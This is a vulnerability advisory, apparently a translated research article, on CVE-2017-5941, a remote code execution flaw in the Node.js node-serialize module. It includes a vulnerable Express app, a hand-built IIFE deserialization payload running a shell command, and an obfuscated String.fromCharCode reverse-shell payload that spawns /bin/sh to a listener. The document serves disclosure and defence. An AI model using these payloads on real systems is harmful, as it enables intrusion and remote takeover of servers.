Exploiting the Node.js node-serialize deserialization vulnerability for remote code execution — vulnerability advisory — the black bar safety net

ID MYHACK58:62201783324
Type myhack58
Reporter 翻译 (translated article)
Modified 2017-02-11T00:00:00


Vulnerability description

Vulnerability name: Exploiting Node.js deserialization bug for Remote Code Execution

Vulnerability CVE id: CVE-2017-5941

Vulnerability type: code execution

Vulnerability description:

Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution: the attacker supplies a serialized JavaScript object whose function property is written as an immediately invoked function expression (IIFE), so the function runs during deserialization itself, before the application ever touches the result.

Vulnerability details

While reviewing Node.js code I came across a serialization/deserialization module named node-serialize. The cookie value from the request was being passed straight into the unserialize() function that this module provides. The following is an example of such a vulnerable Node.js application:

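// Minimal Express app that reproduces the vulnerable pattern: a client-controlled
// cookie is base64-decoded and handed to node-serialize's unserialize().
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
app.use(cookieParser());

app.get('/', function (req, res) {
  if (req.cookies.profile) {
    // The cookie is attacker-controlled input; base64 is an encoding, not a protection.
    // Buffer.from() replaces the deprecated `new Buffer()` constructor.
    var str = Buffer.from(req.cookies.profile, 'base64').toString();
    // VULNERABLE SINK: node-serialize 0.0.4 rebuilds "_$$ND_FUNC$$_..." string values into
    // functions with eval(), so a payload containing an IIFE executes right here, during
    // deserialization. A safe replacement is JSON.parse() followed by schema validation.
    var obj = serialize.unserialize(str);
    if (obj.username) {
      // Return here so the handler does not fall through to the second res.send() below,
      // which would otherwise throw once headers have already been sent.
      return res.send("Hello" + escape(obj.username));
    }
  } else {
    // base64 of {"username":"ajin","country":"india","city":"bangalore"}.
    // httpOnly only hides the cookie from page scripts; it does not stop the client
    // from sending an arbitrary value back, so it is no defense against this bug.
    res.cookie('profile', 'eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=', {
      maxAge: 900000,
      httpOnly: true,
    });
  }
  res.send("Hello World");
});

app.listen(3000);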

Java, PHP, Ruby and Python all have well-documented deserialization problems; see for example:

Understanding PHP Object Injection

Java Deserialization Cheat Sheet

Rails Remote Code Execution Vulnerability Explained

Arbitrary code execution with Python pickles

But I could not find any resource describing an equivalent deserialization bug in Node.js.

Building the Payload

I used node-serialize version 0.0.4 for this research, with the goal of achieving arbitrary code execution when untrusted data is passed to unserialize(). The easiest way to build a payload is to use the same module's serialize() function.

I created the following JavaScript object and passed it to the serialize() function.

// Object whose "rce" property is a plain function. Serializing it shows how node-serialize
// encodes function values: the function source is stored as a string behind the
// "_$$ND_FUNC$$_" marker, which is what unserialize() later turns back into code.
var serialize = require('node-serialize');

var y = {
  rce: function () {
    require('child_process').exec('ls /', function (error, stdout, stderr) {
      console.log(stdout);
    });
  },
};

console.log("Serialized: \n" + serialize.serialize(y));

The output is as follows:


Now we have a serialized string that unserialize() will turn back into an object, but the code does not run until something actually calls the function stored in the rce property — and the target application never does. JavaScript's immediately invoked function expression (IIFE) solves this: appending parentheses () directly after the function body makes the function run as soon as the object is created, similar in spirit to a C++ class constructor.


// Same object, but the function is now invoked on the spot (an IIFE: note the "()" right
// after the function body). The function has no return statement, so the "rce" property
// ends up holding undefined instead of a function -- the command runs once, at object
// creation time, and serialize() is left with no function to encode.
var serialize = require('node-serialize');

var y = {
  rce: function () {
    require('child_process').exec('ls /', function (error, stdout, stderr) {
      console.log(stdout);
    });
  }(),
};

console.log("Serialized: \n" + serialize.serialize(y));

This produces the following output:


The IIFE runs (the command executes when the object is built), but serialization no longer yields a usable function, because the property now holds the call's return value rather than the function itself. So instead I took the earlier serialized string and added the parentheses () after the function body by hand, then passed that string to unserialize() — and it worked. This gives us the exploit payload:

{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process'). exec('ls /', function(error, stdout, stderr) { console. log(stdout) });\n }()"}

Passing it to the unserialize() function causes code execution:

// Deserialize the hand-crafted payload. unserialize() rebuilds the "_$$ND_FUNC$$_" string
// into a function expression and evaluates it; the trailing "()" inside the string makes
// that expression a call, so `ls /` runs during deserialization with no further action
// from the caller.
var serialize = require('node-serialize');

var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\'). exec(\'ls /\', function(error, stdout, stderr) { console. log(stdout) });}()"}';

serialize.unserialize(payload);



Now we know that the unserialize() function of the node-serialize module can be exploited. Let us exploit the vulnerability in the web application by generating a reverse shell.

Further Exploitation

The vulnerability in the web application is that it reads a cookie named profile from the HTTP request, base64-decodes the cookie value, and passes it to the unserialize() function. Since the cookie is untrusted, client-controlled input, an attacker can craft a malicious cookie value to exploit this vulnerability. Note that the httpOnly flag the application sets on the cookie offers no protection here: it only prevents page scripts from reading the cookie, not the client from sending back an arbitrary value.

I used nodejsshell.py to generate a reverse-shell payload. (Decoding the String.fromCharCode payload below shows a small flaw in the generated code: the error handler passes `c(HOST,PORT)` — a call, not a function reference — to setTimeout, so on a connection error it reconnects immediately rather than after TIMEOUT.)

$ python nodejsshell.py 127.0.0.1 1337
[+] LHOST = 127.0.0.1
[+] LPORT = 1337
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,50,55,46,48,46,48,46,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))
